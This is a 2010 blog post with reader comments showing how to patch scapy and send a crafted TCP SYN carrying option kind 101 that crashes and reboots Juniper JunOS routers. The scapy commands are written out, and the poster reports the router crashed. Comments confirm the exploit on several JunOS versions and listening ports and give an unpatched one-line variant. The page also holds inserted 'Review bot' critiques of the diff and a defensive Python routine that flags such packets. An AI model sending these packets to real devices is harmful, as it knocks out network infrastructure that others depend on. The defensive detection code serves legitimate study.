Use scapy to send JunOS killin’ packet
Written by jlgaddis on January 10, 2010 – 3:38 pm
I just quickly hacked up scapy so that it would support sending TCP packets with option kind 0x65 (decimal 101). A diff is below (basically, just need to add two lines).
For reference, I’m on a FreeBSD 8.0 box running scapy 2.1.0 (from ports). inet.py is located in /usr/local/lib/python2.6/site-packages/scapy/layers.
$ diff inet.py inet.py.bak
203,204c203
< 15 : ("AltChkSumOpt",None),
< 101 : ("JunOS",None)
---
> 15 : ("AltChkSumOpt",None)
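Review bot: the direction of this diff is reversed. It was taken as `diff inet.py inet.py.bak`, so in 203,204c203 the `<` lines are the edited file and the `>` line is the original; read as a patch, it removes the `101 : ("JunOS",None)` entry instead of adding it. Putting the original first and using unified format would fix the direction and carry context lines, where the bare line number 203 only matches this exact copy of inet.py.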
215d213
< "JunOS":101
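Review bot: `"JunOS":101` in 215d213 is the name-to-number counterpart of the `101 : ("JunOS",None)` entry in the previous hunk, and the two are maintained by hand with nothing tying them together. Both edits are also made in place in the installed copy under site-packages, which an upgrade of the port would overwrite; the text next to the diff should say so.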
$
Once we've done that, we can then use scapy to launch a JunOS killin' packet for us!
$ sudo scapy
Welcome to Scapy (2.1.0)
>>> p=IP(dst='192.168.1.61')/TCP(dport=23,flags='S',options=[('JunOS', '')])
>>> send(p)
.
Sent 1 packets.
>>>
The box, of course, crashed and rebooted immediately.
Tags: hacking, internet, networking, security, software | 9 Comments »
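From the receiving side, a segment like the one in the post can be recognised by walking the TCP options of each header arriving at a listening port. The following is an added example, not code from the original post or from scapy: a stand-alone Python 3 option walker whose function names (`walk_tcp_options`, `flag_segment`, `make_header`) and sample headers are constructed for illustration.

```python
import struct

WATCHED_KINDS = {101}  # 0x65, the option kind used in the post

def walk_tcp_options(tcp):
    """Yield (kind, length, value) per option; ValueError if lengths are inconsistent."""
    if len(tcp) < 20:
        raise ValueError("short TCP header")
    header_len = (tcp[12] >> 4) * 4           # data offset is in 32-bit words
    if header_len < 20 or header_len > len(tcp):
        raise ValueError("bad data offset")
    opts, i = tcp[20:header_len], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                          # End of Option List
            return
        if kind == 1:                          # No-Operation is a single byte
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("option %d has no length byte" % kind)
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("option %d has bad length %d" % (kind, length))
        yield kind, length, opts[i + 2:i + length]
        i += length

def flag_segment(tcp):
    """Return findings for one raw TCP header; an empty list means nothing to report."""
    findings = []
    try:
        for kind, length, _value in walk_tcp_options(tcp):
            if kind in WATCHED_KINDS:
                findings.append("watched option kind %d (len %d)" % (kind, length))
    except ValueError as exc:
        findings.append("malformed options: %s" % exc)
    return findings

def make_header(options, flags=0x02):
    """Constructed TCP header for the samples: arbitrary ports, zero seq and checksum."""
    options += b"\x00" * (-len(options) % 4)   # pad to a 32-bit boundary
    offset = (20 + len(options)) // 4
    return struct.pack("!HHIIBBHHH", 40000, 23, 0, 0, offset << 4, flags, 8192, 0, 0) + options

# Constructed samples, not captured traffic.
NORMAL_SYN = make_header(b"\x02\x04\x05\xb4")    # MSS 1460 only
KIND_101_SYN = make_header(b"\x65\x02")          # kind 101 with an empty value
TRUNCATED = make_header(b"\x08\x0a\x00\x00")     # option claims 10 bytes, 4 present
for name, hdr in (("normal", NORMAL_SYN), ("kind101", KIND_101_SYN), ("truncated", TRUNCATED)):
    print(name, flag_segment(hdr))
```

The same walk can be run over the TCP header bytes of captured SYNs; malformed option lengths are reported alongside the watched kind because both are worth a look on a management-plane port.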




January 10th, 2010 at 4:25 pm
Does the vulnerability get exploited on any destination port other than telnet? What if you sent the same packet to 179, 22, 443, etc.?
January 10th, 2010 at 4:27 pm
@anon — According to Juniper’s PSN, it should work on any TCP port that is “listening”. So it would work on 179, 22, 443, etc. if BGP/SSH/HTTPS etc. were running. I’ve tested it on 22/TCP, 23/TCP, and 80/TCP.
January 10th, 2010 at 5:18 pm
Thanks for confirming... what a mess!
January 10th, 2010 at 11:30 pm
I am wondering if anybody has actually confirmed that this works on the super old versions of JunOS I am using… My guess is that the old versions with FreeBSD 4.11 underneath may not have this problem. I cannot get my 7.4 Olive box to crash, nor an M40 with 7.0.
January 11th, 2010 at 9:20 am
No need to patch Scapy: TCP(options=[(101, '')])
January 11th, 2010 at 10:59 am
I couldn’t duplicate this on an M series running 7.6R3.6. I did duplicate this on 8.5R4.3.
Thanks for the code!
January 11th, 2010 at 2:38 pm
I confirmed this works on 7.6I2.
January 11th, 2010 at 3:01 pm
@anonymous_coward — Thanks! I don’t use scapy much and didn’t realize I could pass options like that.
January 11th, 2010 at 3:02 pm
@Derek — Thanks for the confirmation!
The only 7.x version I have is 7.3R3.6. If I have time tonight, I’ll install it and see if I can get it to crash.